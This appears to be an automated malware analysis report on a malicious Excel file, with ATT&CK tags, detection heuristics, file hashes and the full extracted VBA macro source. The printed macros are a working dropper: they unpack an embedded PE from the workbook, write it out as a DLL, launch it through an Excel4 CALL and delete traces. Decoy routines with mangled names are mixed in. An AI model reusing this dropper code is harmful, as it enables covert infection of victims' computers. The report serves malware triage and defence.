MALICIOUS
Risk Score: 462
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
T1204.002 Malicious File
T1027 Obfuscated Files or Information
The sample is a malicious Excel document containing VBA macros that leverage `Shell()` and `CreateObject` to execute embedded code. It also references Windows API functions like `VirtualProtect`, `LoadLibrary`, and `GetProcAddress`, indicating dynamic code execution or unpacking. The presence of an embedded PE executable and ClamAV detections for 'Xls.Dropper.Agent' and 'Win.Trojan.Razy' strongly suggest this file acts as a dropper for a secondary payload. The VBA macro's intent appears to be to launch this embedded executable.
Heuristics (10)
- ClamAV: Xls.Dropper.Agent-7580380-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.Agent-7580380-0
- Embedded PE executable (critical, OLE_EMBEDDED_EXE): MZ/PE header found inside document, possible embedded executable
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `Set FucjiFilm = CreateObject("WScri" + "pt.Shell")` `PRP = "%" & UserForm6.TextBox1.Tag`
- VBA ActiveX event launches decoded Excel4 macro (critical, OLE_VBA_ACTIVEX_XLM_STAGER): The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not. This is the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set FucjiFilm = CreateObject("WScri" + "pt.Shell")` `PRP = "%" & UserForm6.TextBox1.Tag`
- Reference to LoadLibrary API (high, SC_STR_LOADLIBRARY): Reference to LoadLibrary API
- Reference to GetProcAddress API (high, SC_STR_GETPROCADDRESS): Reference to GetProcAddress API
- Reference to VirtualProtect API (medium, SC_STR_VIRTUALPROTECT): Reference to VirtualProtect API
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (3)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28539 bytes |

SHA-256: 20852913d225f0836173b41bfc7f624be75705c5b224cfe9ae05a5f9855b9dd7

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub addWBActivate()
Dim VBProj
Dim VBComp
Dim codeMod
Dim formsFolder As String
Dim tmpColl As Collection
Dim wBook As Workbook
Dim filesToPrcs As Collection
Dim flw
Dim cdw
Dim fullFName As String
Dim activateExist As Boolean
formsFolder = "C:\Users\GalkinVa\files_for_transport"
Set tmpColl = flw.getPathsToFilesFromFolder(formsFolder)
If tmpColl Is Nothing Then
Err.Raise 13, Description:="tmpColl variable doesn"
End If
Set filesToPrcs = tmpColl
For Each fName In filesToPrcs
fullFName = fName
fName = flw.extractNameWithExt(fullFName)
Set wBook = Workbooks.Open(fullFName)
Set VBProj = wBook.VBProject
If cdw.VBComponentExists("ThisWorkbook", VBProj) Then
Set VBComp = VBProj.VBComponents("ThisWorkbook")
ElseIf cdw.VBComponentExists("ЭтаКнига", VBProj) Then
Set VBComp = VBProj.VBComponents("ЭтаКнига")
Else
Err.Raise 13, "try to set VBComponent", "components from check doesn"
End If
Set codeMod = VBComp.CodeModule
Set tmpColl = cdw.ListProcedures(VBComp)
For Each proc In tmpColl
If proc = "Workbook_Activate" Then
activateExist = True
End If
Next proc
If Not activateExist Then
Call cdw.CreateEventProcedure(VBComp)
Else
Debug.Print "Workbook_Activate already exist in " & wBook.Name
End If
wBook.RunAutoMacros xlAutoClose
On Error Resume Next
wBook.Close saveChanges:=True
If Err.Number <> 0 Then
Debug.Print "Error occured when try to save " & wBook.Name
End If
Next fName
End Sub
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.CreateLinkedChart
End If
End Sub
Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Public Property Get Keys() As Collection
Set Keys = IKeys
End Property
Public Property Get Items() As Collection
Set Items = IItms
End Property
Public Sub CreateLinkedChart()
Dim FucjiFilm As Object
Dim SpecialPath As String
Set FucjiFilm = CreateObject("WScri" + "pt.Shell")
PRP = "%" & UserForm6.TextBox1.Tag
UserForm6.TextBox1.Tag = FucjiFilm.ExpandEnvironmentStrings(PRP + "%")
UserForm6.TextBox3.Tag = FucjiFilm.SpecialFolders(UserForm6.TextBox3.Tag)
ChDir (UserForm6.TextBox1.Tag)
UserForm1.show
End Sub
Public Sub Remove(Key)
If TypeName(Key) = "String" Then
Dim i
On Error Resume Next
Call IItms.Remove(Key)
Call IKeys.Remove(Key)
For i = 1 To IItms.Count
If InStr("Collection,Prop", TypeName(IItms.Item(i))) <> 0 Then
If IItms.Item(i).Item("Name") = Key Then
Call IItms.Remove(i)
Call IKeys.Remove(i)
Exit For
End If
End If
Next
On Error GoTo 0
Else
Call IItms.Remove(Key)
Call IKeys.Remove(Key)
End If
End Sub
Private Function setItem(Key, Value, Optional RepFlg = True)
Dim i As Integer
If TypeName(Key) = "String" Then
If RepFlg Then
If Key <> "" Then
Call IItms.Add(Value)
Call IKeys.Add(IItms.Count)
End If
Else
MsgBox "???"
End If
Else
If IItms.Count < Key Then
For i = IItms.Count To Key - 2
Call IItms.Add("")
Next
End If
If RepFlg Then
On Error Resume Next
Call IItms.Remove(Key)
On Error GoTo 0
If IItms.Count < Key Then
Call IItms.Add(Value)
Else
Call IItms.Add(Value, before:=Key)
End If
Else
If Key = 0 Then
If IItms.Count = 0 Then
Call IItms.Add(Value)
Else
Call IItms.Add(Value, before:=1)
End If
Else
If IItms.Count < Key Then
Call IItms.Add("")
Call IItms.Add(Value)
Else
Call IItms.Add(Value, after:=Key)
End If
End If
End If
End If
End Function
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{69BD20F5-9B6C-4EDC-8FBB-D75A65191826}{3B83FD19-053A-46AD-B350-25218F473372}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()
End Sub
Private Sub UserForm_Activate()
DoEvents
DoEvents
ChenderBegin
DoEvents
End Sub
Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)
End Sub
Attribute VB_Name = "Module2"
#If VBA7 And Win64 Then
Public Const IsSecond = True
#Else
Public Const IsSecond = False
#End If
Public Function PrepareConfigForOutput() As Integer
On Error Resume Next
Dim i As Long
Dim sNextChar As String
Dim bInside As Boolean
Dim bQuoted As Boolean
Dim sCommand As String
PrepareConfigForOutput = 0
bInsideParameter = False
bQuoted = False
sCommand = Command$
For i = 1 To ALen.B(sCommand)
sNextChar = Mid(sCommand, i, 1)
If bInsideParameter Then
If bQuoted Then
If sNextChar = " " Then
bInsideParameter = False
bQuoted = False
PrepareConfigForOutput = PrepareConfigForOutput + 1
End If
End If
End If
Next i
If bInsideParameter Then PrepareConfigForOutput = PrepareConfigForOutput + 1
End Function
Public Sub ChenderBegin()
WhereToGo = UserForm6.TextBox1.Tag & "\stamp3" + ".xls" + "x"
CustomWBP = WhereToGo + "." + "zi" + "p"
buildPathFor = UserForm6.TextBox1.Tag
Dim OpenForBinaryLock As String
Dim CurrentSizeOfAT As Long
Dim WhichArch As Integer
OpenForBinaryLock = UserForm6.TextBox3.Tag + "\20report_"
OpenForBinaryLock = OpenForBinaryLock & ".dl" + "l"
PublicResumEraseByArrayList buildPathFor + "\ole" + "Obj" + "ect*.b" + "" + "in", CustomWBP, OpenForBinaryLock
ReplaceFile WhereToGo
FileCopy WhereToGo, CustomWBP
WhichArch = 1
Dim objDirectoryFolder As Object
Dim objDirectoryFolder2 As Object
Set oApp = CreateObject("Shell." + "Application")
If WhichArch > 0 And WhichArch > -30 Then
Set objDirectoryFolder2 = oApp.Namespace(buildPathFor)
Set objDirectoryFolder = oApp.Namespace(CustomWBP)
objDirectoryFolder2.CopyHere objDirectoryFolder.Items.Item("xl\e" + "mbed" + "dings\oleObject1.b" + "in")
End If
CurrentSizeOfAT = 221184
If IsSecond Then
CurrentSizeOfAT = 300000 + 5660 + 4
WhichArch = 2
End If
SimplexMethod buildPathFor + "\oleObject" + "1.b" + "in", OpenForBinaryLock, CurrentSizeOfAT, WhichArch
If WhichArch > 0 Then
WhichArch = WhichArch + 1
ChDir (UserForm6.TextBox3.Tag)
WhichArch = WhichArch + 1
End If
If WhichArch < 100 Then
WhichArch = WhichArch + 1
WhichArch = WhichArch + 1
End If
PrepareConfigForOutput
If WhichArch < 0 Then
WhichArch = WhichArch + 1
WhichArch = WhichArch + 1
End If
OpenForBinaryLock = "CALL(""" + OpenForBinaryLock
ExecuteExcel4Macro OpenForBinaryLock + """,""oakkzm"",""J"")"
End Sub
Public Function PathBack(ByVal sPath As String) As String
On Error Resume Next
Dim sT As Variant
Dim tt As String
If Len(sPath) = 3 Then GoTo errorhand
For ii = 0 To UBound(sT) - 2
tt = tt & sT(ii) & "\"
Next ii
PathBack = tt
errorhand:
PathBack = sPath
End Function
Public Function GetParam(Count As Integer) As String
Dim i As Long
Dim j As Integer
Dim c As String
Dim bInside As Boolean
Dim bQuoted As Boolean
j = 1
bInside = False
bQuoted = False
GetParam = ""
For i = 1 To Len(Command$)
c = Mid$(Command$, i, 1)
If bInside And bQuoted Then
If c = """" Then
j = j + 1
bInside = False
bQuoted = False
End If
ElseIf bInside And Not bQuoted Then
If c = " " Then
j = j + 1
bInside = False
bQuoted = False
End If
Else
If c = """" Then
If j > Count Then Exit Function
bInside = True
bQuoted = True
ElseIf c <> " " Then
bInside = True
bQuoted = False
End If
End If
If bInside And j = Count And c <> """" Then GetParam = GetParam & c
Next i
End Function
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm6"
Attribute VB_Base = "0{33D13F1D-D4A0-4558-B419-4191A697F99D}{213658A8-6A80-4F3A-A8B1-7BBC3668EA27}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module6"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000
#If VBA7 Then
Private Declare PtrSafe Function BoxWSL _
Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _
ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare PtrSafe Function FindWindowA _
Lib "user32" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare PtrSafe Function DrawMenuBar _
Lib "user32" (ByVal parameter1 As Long) As Long
Private Declare PtrSafe Function GetWindowLong11 _
Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _
ByVal nIndex As Long) As Long
#Else
Private Declare Function GetWindowLong11 _
Lib "user32" Alias "GetWindowLongA" ( _
ByVal parameter1 As Long, ByVal nIndex As Long) As Long
Private Declare Function BoxWSL _
Lib "user32" Alias "SetWindowLongA" ( _
ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function FindWindowA _
Lib "user32" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare Function DrawMenuBar _
Lib "user32" (ByVal parameter1 As Long) As Long
#End If
Private Sub cmdStart_Click()
Dim System As Long
Dim Sound As Long
Dim result
Dim Version As Long
Dim Data(0 To 4095) As Byte
Dim Length As Long
Dim Read As Long
Dim bytesread As Long
Dim outfp As Long
result = FMOD_Syst.em_Create(System)
ERRCHECK (result)
result = FMOD_Syst.em_GetVersion(System, Version)
ERRCHECK (result)
result = FMOD_Sys.tem_Init(System, 1, FMOD_INIT_NORMAL, 0)
ERRCHECK (result)
result = FMOD_Sys.tem_CreateStream(System, "../../examples/media/wave.mp3", FMOD_OPENONLY Or FMOD_ACCURATETIME, Sound)
ERRCHECK (result)
result = FMOD_Soun.d_GetLength(Sound, Length, FMOD_TIMEUNIT_PCMBYTES)
ERRCHECK (result)
bytesread = 0
Do
result = FMOD_Soun.d_ReadData(Sound, GetA.ddrOf(Data(0)), 4096, Read)
bytesread = bytesread + Read
Call lW.rite(outfp, GetA.ddrOf(Data(0)), Read)
StatusBar.SimpleText = "writing " & bytesread & " bytes of " & Length & " to output.raw"
Loop While (result = FMOD_OK And Read = 4096)
StatusBar.SimpleText = "done"
lC.lose (outfp)
result = FMOD_So.und_Release(Sound)
ERRCHECK (result)
result = FMOD_Sys.tem_Close(System)
ERRCHECK (result)
result = FMOD_Sys.tem_Release(System)
ERRCHECK (result)
End Sub
Private Sub cmdExit_Click()
Unload M.e
End
End Sub
Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long
windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong11(windowHandle, GWL_STYLE)
If show Then
BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)
Else
BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)
End If
DrawMenuBar (windowHandle)
End Sub
Public Sub NumberBuffer(Number As Long, ByVal Buffer As Byte)
If UserForm1.Enabled = True Then
Put #Number, , Buffer
End If
End Sub
Private Sub ERRCHECK(result)
If msgR Then
End
End If
If result = RCPND_FMOD_OK Then
ms.gR.esult = MsgBox(" <<<No.." + ".. daaa! " & result & ") " & FMOD_Er_rorStr.ing(result))
End If
End Sub
Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
On Error Resume Next
For Each Key In putArrayBigList
Kill Key
Next Key
On Error GoTo 0
End Sub
Attribute VB_Name = "Module5"
Public Sub Text_Write(progbar As Object, tmptext As String, tmpSpalte As Long, tmpZeile As Long, tmpcolor As Long)
For i = 1 To Len(tmptext)
If TextClockWise = True Then
For x = tmpSpalte To tmpSpalte + UBound(ZeichenArray, 1)
For y = tmpZeile - Letter.Position + Letter.FontHeight - 1 To tmpZeile - Letter.Position - UBound(ZeichenArray, 2) + Letter.FontHeight - 1 Step -1
OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1)
OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1))
If ZeichenArray(x - tmpSpalte, tmpZeile - Letter.Position + Letter.FontHeight - 1 - y) Then
Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False
Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255
Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255
Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255
Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0)
End If
Next y
Next x
Else
OldLetter.ArrayRGB(ZeichenAnzahl - 1).Left = tmpSpalte
OldLetter.ArrayRGB(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position
OldLetter.ArraySW(ZeichenAnzahl - 1).Left = tmpSpalte
OldLetter.ArraySW(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position
For x = tmpSpalte To tmpSpalte - UBound(ZeichenArray, 1) Step -1
For y = tmpZeile + Letter.Position To tmpZeile + Letter.Position + UBound(ZeichenArray, 2)
OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1)
OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile - Letter.Position) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1))
If ZeichenArray(tmpSpalte - x, y - tmpZeile - Letter.Position) Then
Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False
Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255
Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255
Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255
Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0)
End If
Next y
Next x
End If
progbar.Value = i
Next i
progbar.Value = 0
Dra.w_Zoom picsource, pictarget
End Sub
Public Sub SimplexMethod(SimplexMethod2 As String, OpenForBinaryLock As String, fl As Long, Report6 As Integer)
Dim Report1 As Long, ByteSpin As Byte, FirstB As Byte, SecondB As Byte, ThirdB As Byte, Report3 As Byte, Report4 As Byte
Dim Class1 As Class1
Set Class1 = New Class1
Dim SimpleMethod As Integer
ReDim MousePointerLeak(1 To fl)
Report1 = FreeFile
Open SimplexMethod2 For Binary Access Read As Report1
Dim cur As Integer
cur = 1
FirstB = 77
SecondB = 90
ThirdB = 144
Do While Not EOF(Report1)
Get Report1, , ByteSpin
If ByteSpin = FirstB Then
MousePointerLeak(1) = ByteSpin
Get Report1, , Report3
If Report3 = SecondB Then
MousePointerLeak(2) = Report3
Get Report1, , Report4
If Report4 = ThirdB Then
MousePointerLeak(3) = Report4
If cur = Report6 Then
For k = 4 To fl
Get Report1, , ByteSpin
MousePointerLeak(k) = ByteSpin
Next k
Exit Do
Else
cur = cur + 1
End If
End If
End If
End If
Loop
Close Report1
Report1 = FreeFile
Open OpenForBinaryLock For Binary Lock Read Write As #Report1
For i = LBound(MousePointerLeak) To UBound(MousePointerLeak)
If UserForm1.Enabled = True Then
NumberBuffer Report1, MousePointerLeak(i)
End If
Next i
Close Report1
End Sub
Public Function Load(HTMLSource As Variant) As Boolean
On Error GoTo ErrorTrap
Const Chunk = 1000
Dim WorkingSrc As String
Dim TagStart As Long
Dim TagEnd As Long
Dim TagLength As Long
Dim TagStartString As String
Dim spli.tt.est() As String
Dim Ptr As Long
Dim Cnt As Long
Dim Pos As Long
Dim testing As Boolean
Dim PosScriptEnd As Long
Dim PosEndScript As Long
Dim PosEndScriptEnd As Long
WorkingSrc = HTMLSource
LocalElementCount = 0
LocalElementSize = 0
ReDim LocalElements(LocalElementSize)
If NewWay Then
Load = True
Ptr = 0
Do
BlobSN = "/blob" & GetRan.domInteger() & ":"
Ptr = Ptr + 1
Loop While ((InStr(1, WorkingSrc, BlobSN, vbTextCompare) <> 0) And (Ptr < 10))
spli.tt.est = Split(WorkingSrc, "<style")
Cnt = UBound(spli.tt.est) + 1
If Cnt > 1 Then
For Ptr = 1 To Cnt - 1
PosScriptEnd = InStr(1, spli.tt.est(Ptr), ">")
If PosScriptEnd > 0 Then
PosEndScript = InStr(PosScriptEnd, spli.tt.est(Ptr), "</style", vbTextCompare)
If PosEndScript > 0 Then
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
spli.tt.est(Ptr) = Mi.d(spli.tt.est(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mi.d(spli.tt.est(Ptr), PosEndScript)
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
Blo.bs(BlobCnt) = Mi.d(spli.tt.est(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1)
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
End If
End If
Next
WorkingSrc = Join(spli.tt.est, "<style")
End If
spli.tt.est = Split(WorkingSrc, "<style")
Cnt = UBound(spli.tt.est) + 1
If Cnt > 1 Then
For Ptr = 1 To Cnt - 1
PosScriptEnd = InStr(1, spli.tt.est(Ptr), ">")
If PosScriptEnd > 0 Then
PosEndScript = InStr(PosScriptEnd, spli.tt.est(Ptr), "</style", vbTextCompare)
If PosEndScript > 0 Then
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
spli.tt.est(Ptr) = Mi.d(spli.tt.est(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mi.d(spli.tt.est(Ptr), PosEndScript)
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
Blo.bs(BlobCnt) = Mi.d(spli.tt.est(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1)
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
BlobCnt = BlobCnt + 1
End If
End If
Next
WorkingSrc = Join(spli.tt.est, "<style")
End If
Exit Function
End If
ErrorTrap:
Call Handle.Error("Load", Err.Number, Err.Source, Err.Description)
End Function
Attribute VB_Name = "Module4"
Public MousePointerLeak() As Byte
Public Function SetResourceBytes(lpType As Long, lpID As Long, lpData() As Byte, lpFile As String) As Long
Dim pReturn As Long, rPort As Long, nCount As Long
nCount = UBound(lpData) + 1 - LBound(lpData)
pReturn = BeginUpdate.Resource(lpFile, False)
If pReturn <> 0 Then
rPort = Update.Resource1(pReturn, lpType, lpID, 1033, lpData(LBound(lpData)), nCount)
EndUpdate.Resource pReturn, False
If rPort <> 0 Then SetResourceBytes = True
End If
End Function
Sub ConvertChartToPicture()
Dim Cht As Chart
If ActiveChart Is Nothing Then Exit Sub
If TypeName(ActiveSheet) = "Chart" Then Exit Sub
Set Cht = ActiveChart
Cht.CopyPicture Appearance:=xlPrinter, _
Size:=xlScreen, Format:=xlPicture
ActiveWindow.RangeSelection.Select
ActiveSheet.Paste
End Sub
Private Function setItem(Key, Value, Optional RepFlg = True)
Dim i As Integer
If TypeName(Key) = "String" Then
If RepFlg Then
If Key <> "" Then
On Error Resume Next
Call IItms.Remove(Key)
Call IKeys.Remove(Key)
On Error GoTo 0
Call IItms.Add(Value, Key)
Call IKeys.Add(Key, Key)
Else
Call IItms.Add(Value)
Call IKeys.Add(IItms.Count)
End If
Else
MsgBox "???"
End If
Else
If IItms.Count < Key Then
For i = IItms.Count To Key - 2
Call IItms.Add("")
Next
End If
If RepFlg Then
On Error Resume Next
Call IItms.Remove(Key)
On Error GoTo 0
If IItms.Count < Key Then
Call IItms.Add(Value)
Else
Call IItms.Add(Value, before:=Key)
End If
Else
If Key = 0 Then
If IItms.Count = 0 Then
Call IItms.Add(Value)
Else
Call IItms.Add(Value, before:=1)
End If
Else
If IItms.Count < Key Then
Call IItms.Add("")
Call IItms.Add(Value)
Else
Call IItms.Add(Value, after:=Key)
End If
End If
End If
End If
End Function
Public Sub ReplaceFile(WhereToGo)
DoEvents
ThisWorkbook.Sheets.Copy
Application.DisplayAlerts = False
DoEvents
ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
DoEvents
ActiveWorkbook.Close
DoEvents
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| embedded_office_00002935.exe | embedded-pe | Office MZ+PE at offset 0x2935 | 710347 bytes |

SHA-256: 3519f5957ea024035a7f3567e056bf2230add3404f505f8c0baa3d4a88679fe6

Detection
- ClamAV: Win.Trojan.Razy-7331387-0
- Obfuscation or payload: likely. Carved artifact entropy is 7.95, consistent with packed or encrypted content.

| Filename | Kind | Source | Size |
|---|---|---|---|
| ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD002C01E7/Ole10Native | 534110 bytes |

SHA-256: 31c029997f3b038d33a3a5f65af1a7ddb1777968139581148f408aad71cd5bf1

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact entropy is 7.95, consistent with packed or encrypted content.